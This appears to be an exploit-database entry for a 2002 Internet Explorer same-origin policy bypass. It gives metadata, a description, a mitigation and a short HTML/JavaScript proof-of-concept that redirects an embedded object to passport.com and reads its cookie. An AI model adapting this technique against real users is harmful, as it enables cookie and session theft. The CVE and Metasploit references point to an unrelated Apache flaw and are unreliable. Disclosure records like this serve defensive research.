header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
SecurityFocus
7.5
CVSS
HIGH
Same Origin Policy Violation
16
CWE
Product Name: Internet Explorer
Affected Version From: Internet Explorer 5.0
Affected Version To: Internet Explorer 6.0
Patch Exists: Yes
Related CWE: CVE-2002-0392
CPE: a:microsoft:internet_explorer
Metasploit: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2002-0392/https://www.rapid7.com/db/vulnerabilities/http-apache2-chunked-transfer-int-bof/https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-apache-chunked-encoding-vulnerability-cve-2002-0392/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Microsoft Internet Explorer Same Origin Policy Violation

Microsoft Internet Explorer allows script code to violate the same origin policy through usage of the HTML OBJECT tag. Malicious script code may obtain a legitimate reference to an embedded object containing a web page from the same domain. This script may then change the location of the embedded object to a sensitive page, and maintain the reference to the object. This provides full access to the DOM of the embedded page.

Mitigation:

Disable Active Scripting in Internet Explorer or use a different browser.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5196/info

Microsoft Internet Explorer allows script code to violate the same origin policy through usage of the HTML OBJECT tag. Malicious script code may obtain a legitimate reference to an embedded object containing a web page from the same domain. This script may then change the location of the embedded object to a sensitive page, and maintain the reference to the object. This provides full access to the DOM of the embedded page. 

<object id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.href = "http://www.passport.com";
setTimeout("alert(ref.cookie)",5000);
</script>

Navigation

Suggest Exploit

Services By CQR